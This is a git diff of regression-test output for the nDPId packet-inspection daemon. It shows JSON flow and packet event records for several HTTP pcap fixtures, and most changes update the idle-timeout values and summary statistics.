+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492518365663,"flow_last_seen":1492518365968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2844,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1492518365968,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-data-len":2844,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1492518365968} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ -~~ packets captured/processed: 9/0 +~~ packets captured/processed: 9/9 ~~ skipped flows.............: 0 -~~ total layer4 data length..: 0 bytes -~~ total detected protocols..: 0 -~~ total active/idle flows...: 0/0 +~~ total layer4 data length..: 2844 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5099937 bytes -~~ total memory freed........: 5099937 bytes -~~ total allocations/frees...: 113310/113310 +~~ total memory allocated....: 5101178 bytes +~~ total memory freed........: 5101178 bytes +~~ total 
allocations/frees...: 113326/113326 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ json string min len.......: 201 chars -~~ json string max len.......: 2276 chars -~~ json string avg len.......: 1195 chars +~~ json string min len.......: 475 chars +~~ json string max len.......: 844 chars +~~ json string avg len.......: 643 chars diff --git a/test/results/http-lines-split.pcap.out b/test/results/http-lines-split.pcap.out index 0ecb0f504..331063bf9 100644 --- a/test/results/http-lines-split.pcap.out +++ b/test/results/http-lines-split.pcap.out 
@@ -1,11 +1,11 @@ 00467{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http-lines-split.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1593713340401} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593713340401,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1593713340401,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0t6tAAHkGyLLAqAABwKgAFJlEemkrolmxAAAAAIAC+vBZugAAAgQFtAEBBAIBAwMG"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"YDjgxTWgABjzZLGICABFAAA0AABAALIGR17AqAAUwKgAAXppmUT8ca\/AK6JZsoAS+vCBjAAAAgQFtAEBBAIBAwMH"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAAot6xAAHkGyL3AqAABwKgAFJlEemkrolmy\/HGvwVAQA+zlTAAAAAAAAAAA"} -00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1593713340401,"flow_last_seen":1593713340402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1593713340402,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"toni.lan","url":"toni.lan:31337\/","code":0,"content_type":"","user_agent":""}} -00827{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1593713340401,"flow_last_seen":1593713340404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1593713340404,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593713340401,"flow_last_seen":1593713340401,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1593713340401,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593713340401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0t6tAAHkGyLLAqAABwKgAFJlEemkrolmxAAAAAIAC+vBZugAAAgQFtAEBBAIBAwMG"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593713340401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"YDjgxTWgABjzZLGICABFAAA0AABAALIGR17AqAAUwKgAAXppmUT8ca\/AK6JZsoAS+vCBjAAAAgQFtAEBBAIBAwMH"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593713340401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAAot6xAAHkGyL3AqAABwKgAFJlEemkrolmy\/HGvwVAQA+zlTAAAAAAAAAAA"} +00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1593713340401,"flow_last_seen":1593713340402,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1593713340402,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"toni.lan","url":"toni.lan:31337\/","code":0,"content_type":"","user_agent":""}} +00827{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1593713340401,"flow_last_seen":1593713340404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1593713340404,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-data-len":1699,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1593713340404} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/14 diff --git a/test/results/http-manipulated.pcap.out b/test/results/http-manipulated.pcap.out index d2d1ede79..d5fe222c6 100644 --- a/test/results/http-manipulated.pcap.out 
+++ b/test/results/http-manipulated.pcap.out 
@@ -1,18 +1,18 @@ 00467{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http-manipulated.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946727901369} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946727901369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAA0umlAAI8Gr+7AqAAUwKgAB4NgH5BugXMeAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946727901369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg2CKV04jboFzH4AS+vCVmQAAAgQFtAEBBAIBAwMG"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946727901369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAAoumpAAI8Gr\/nAqAAUwKgAB4NgH5BugXMfildOJFAQAfaBhgAA"} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"wwww.lan","url":"wwww.lan:8080\/","code":0,"content_type":"","user_agent":"curl\/7.64.0"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946727901369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAA0umlAAI8Gr+7AqAAUwKgAB4NgH5BugXMeAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946727901369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg2CKV04jboFzH4AS+vCVmQAAAgQFtAEBBAIBAwMG"} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946727901369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAAoumpAAI8Gr\/nAqAAUwKgAB4NgH5BugXMfildOJFAQAfaBhgAA"} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"wwww.lan","url":"wwww.lan:8080\/","code":0,"content_type":"","user_agent":"curl\/7.64.0"}} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","packets-captured":11,"packets-processed":10,"total-skipped-flows":0,"total-l4-data-len":653,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":946729142063} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946729142063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAA0svlAAL4GiF7AqAAUwKgAB4OUH5ARN20zAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946729142063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg5SNfRmbETdtNIAS+vAp\/QAAAgQFtAEBBAIBAwMG"} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946729142063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAAosvpAAL4GiGnAqAAUwKgAB4OUH5ARN200jX0ZnFAQAfaBhgAA"} -00987{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.lan","url":"www.lan:8080\/aaaaaaaaaaaaaaaaaaaaaaaa_very_long_uri","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:81.0) Gecko\/20100101 Firefox\/81.0"}} 
-00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":946727901369,"flow_last_seen":946727901370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":577,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":318,"flow_first_seen":946729142063,"flow_last_seen":946729148160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29200,"flow_tot_l4_payload_len":940892,"flow_avg_l4_payload_len":2958,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946729142063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAA0svlAAL4GiF7AqAAUwKgAB4OUH5ARN20zAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946729142063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg5SNfRmbETdtNIAS+vAp\/QAAAgQFtAEBBAIBAwMG"} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946729142063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAAosvpAAL4GiGnAqAAUwKgAB4OUH5ARN200jX0ZnFAQAfaBhgAA"} +00987{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.lan","url":"www.lan:8080\/aaaaaaaaaaaaaaaaaaaaaaaa_very_long_uri","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:81.0) Gecko\/20100101 Firefox\/81.0"}} 
